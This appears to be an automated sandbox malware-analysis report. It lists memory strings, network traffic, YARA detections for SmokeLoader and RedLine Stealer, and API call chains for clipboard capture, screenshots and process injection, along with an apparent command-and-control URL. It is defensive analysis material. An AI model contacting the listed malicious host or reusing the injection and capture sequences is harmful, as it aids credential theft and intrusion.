                  Source: 21AE.exe, 00000005.00000002.2691748524.0000000000846000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2357257185.0000000000846000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2505921541.0000000002C83000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2357257185.000000000087D000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000002.2692634099.0000000002C83000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2506115149.0000000000846000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://whispedwoodmoodsksl.shop/api
                  Source: 21AE.exe, 00000005.00000003.2505921541.0000000002C83000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000002.2692634099.0000000002C83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whispedwoodmoodsksl.shop/apie
                  Source: 21AE.exe, 00000005.00000002.2691748524.0000000000846000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2506115149.0000000000846000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://whispedwoodmoodsksl.shop/ri
                  Source: 21AE.exe, 00000005.00000003.2383608001.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2383291986.0000000002C72000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2505921541.0000000002C83000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2398025709.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2383365847.0000000002C7D000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000002.2692634099.0000000002C83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whispedwoodmoodsksl.shop:443/api
                  Source: explorer.exe, 00000002.00000000.2040029267.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
                  Source: explorer.exe, 00000002.00000000.2040029267.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon
                  Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000B14000.00000004.00000020.00020000.00000000.sdmp, BGHJJD.13.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                  Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000B14000.00000004.00000020.00020000.00000000.sdmp, BGHJJD.13.drString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                  Source: katA304.tmp, 0000000D.00000003.2954487712.0000000000A36000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.drString found in binary or memory: https://www.digicert.com/CPS0
                  Source: 21AE.exe, 00000005.00000003.2359708104.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359456032.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359292886.0000000002CAA000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2814628102.0000000000A70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: 21AE.exe, 00000005.00000003.2359708104.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359456032.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359292886.0000000002CAA000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2814628102.0000000000A70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                  Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                  Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                  Source: GIIDBG.13.drString found in binary or memory: https://www.mozilla.org
                  Source: GIIDBG.13.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                  Source: GIIDBG.13.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                  Source: 21AE.exe, 00000005.00000003.2385657700.0000000002D94000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986105264.000000001E449000.00000004.00000020.00020000.00000000.sdmp, GIIDBG.13.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                  Source: GIIDBG.13.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: 21AE.exe, 00000005.00000003.2385657700.0000000002D94000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986105264.000000001E449000.00000004.00000020.00020000.00000000.sdmp, GIIDBG.13.drString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                  Source: 21AE.exe, 00000005.00000003.2385657700.0000000002D94000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986105264.000000001E449000.00000004.00000020.00020000.00000000.sdmp, GIIDBG.13.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                  Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                  Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49720 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49722 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49724 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49726 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49727 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49728 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49730 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49731 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.5:49746 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 65.109.242.59:443 -> 192.168.2.5:49748 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Yara detected SmokeLoader
                  Source: Yara matchFile source: 00000004.00000002.2290056275.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2290149216.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2051360690.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2051493658.00000000001D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_0042EAB0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_0042EAB0
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_0042EAB0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_0042EAB0
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_0042EC90 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,5_2_0042EC90
                  Source: Yara matchFile source: 0000000C.00000002.2640862661.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: C9A7.exe PID: 3944, type: MEMORYSTR

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 12.2.C9A7.exe.42a7719.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 12.2.C9A7.exe.2590000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 12.2.C9A7.exe.2590000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 12.2.C9A7.exe.44d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 12.2.C9A7.exe.44d0000.2.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 12.2.C9A7.exe.42a7719.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 00000004.00000002.2290056275.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000004.00000002.2290149216.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 0000000C.00000002.2641621333.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 00000000.00000002.2051360690.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000005.00000002.2691688506.00000000007BD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 0000000C.00000002.2639865641.0000000002590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 00000000.00000002.2051493658.00000000001D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  PE file has a writeable .text section
                  Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: aarhevh.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeCode function: 0_2_00401615 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401615
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeCode function: 0_2_00401658 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401658
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeCode function: 0_2_00403406 NtTerminateProcess,GetModuleHandleA,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,tolower,towlower,0_2_00403406
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeCode function: 0_2_00401620 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401620
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeCode function: 0_2_00401524 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401524
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeCode function: 0_2_0040162D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040162D
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeCode function: 0_2_00401635 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401635
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeCode function: 12_2_042D9B10 NtProtectVirtualMemory,NtProtectVirtualMemory,12_2_042D9B10
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeCode function: 12_2_042DA4F0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess,12_2_042DA4F0
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeCode function: 12_2_042D9850 NtCreateFile,CreateFileMappingA,MapViewOfFile,FindCloseChangeNotification,12_2_042D9850
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_004273535_2_00427353
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_004208805_2_00420880
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_004049705_2_00404970
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_0041FD105_2_0041FD10
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_0043B0505_2_0043B050
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_004261745_2_00426174
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_004061F05_2_004061F0
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_004262845_2_00426284
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_004223B85_2_004223B8
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_004054405_2_00405440
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_0040F4005_2_0040F400
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_004164D25_2_004164D2
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_004334805_2_00433480
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_004035705_2_00403570
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_004215805_2_00421580
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_004016E05_2_004016E0
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_004067B05_2_004067B0
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_004089A05_2_004089A0
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_00424B805_2_00424B80
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_00421C715_2_00421C71
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_00425CEE5_2_00425CEE
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_00440D365_2_00440D36
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_0043AD305_2_0043AD30
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_00407DF05_2_00407DF0
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_00404EF05_2_00404EF0
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_00435EB05_2_00435EB0
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_021412675_2_02141267
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_0217B2B75_2_0217B2B7
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_021663DB5_2_021663DB
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_021480575_2_02148057
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_021620675_2_02162067
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_021761175_2_02176117
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_021451575_2_02145157
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_0214F6675_2_0214F667
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_021456A75_2_021456A7
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_021736E75_2_021736E7
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_021567395_2_02156739
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_021437D75_2_021437D7
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_021464575_2_02146457
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_021664EB5_2_021664EB
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_021675BA5_2_021675BA
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_02146A175_2_02146A17
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_02160AE75_2_02160AE7
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_02144BD75_2_02144BD7
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_02165F555_2_02165F55
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_0217AF975_2_0217AF97
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_02148C075_2_02148C07
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeCode function: 12_2_042DAB1012_2_042DAB10
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9EECD013_2_6C9EECD0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C98ECC013_2_6C98ECC0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA6AC3013_2_6CA6AC30
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA56C0013_2_6CA56C00
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C99AC6013_2_6C99AC60
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C994DB013_2_6C994DB0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA26D9013_2_6CA26D90
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CB1CDC013_2_6CB1CDC0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CB18D2013_2_6CB18D20
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA5ED7013_2_6CA5ED70
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CABAD5013_2_6CABAD50
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA16E9013_2_6CA16E90
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C99AEC013_2_6C99AEC0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA30EC013_2_6CA30EC0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA70E2013_2_6CA70E20
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA2EE7013_2_6CA2EE70
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CAD8FB013_2_6CAD8FB0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C99EFB013_2_6C99EFB0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA6EFF013_2_6CA6EFF0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C990FE013_2_6C990FE0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C996F1013_2_6C996F10
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CAD0F2013_2_6CAD0F20
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA52F7013_2_6CA52F70
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9FEF4013_2_6C9FEF40
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA968E013_2_6CA968E0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA1A82013_2_6CA1A820
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9E082013_2_6C9E0820
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA6484013_2_6CA64840
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA209A013_2_6CA209A0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA4A9A013_2_6CA4A9A0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA509B013_2_6CA509B0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CAAC9E013_2_6CAAC9E0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9C49F013_2_6C9C49F0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9E690013_2_6C9E6900
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9C896013_2_6C9C8960
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA0EA8013_2_6CA0EA80
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA48A3013_2_6CA48A30
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA3EA0013_2_6CA3EA00
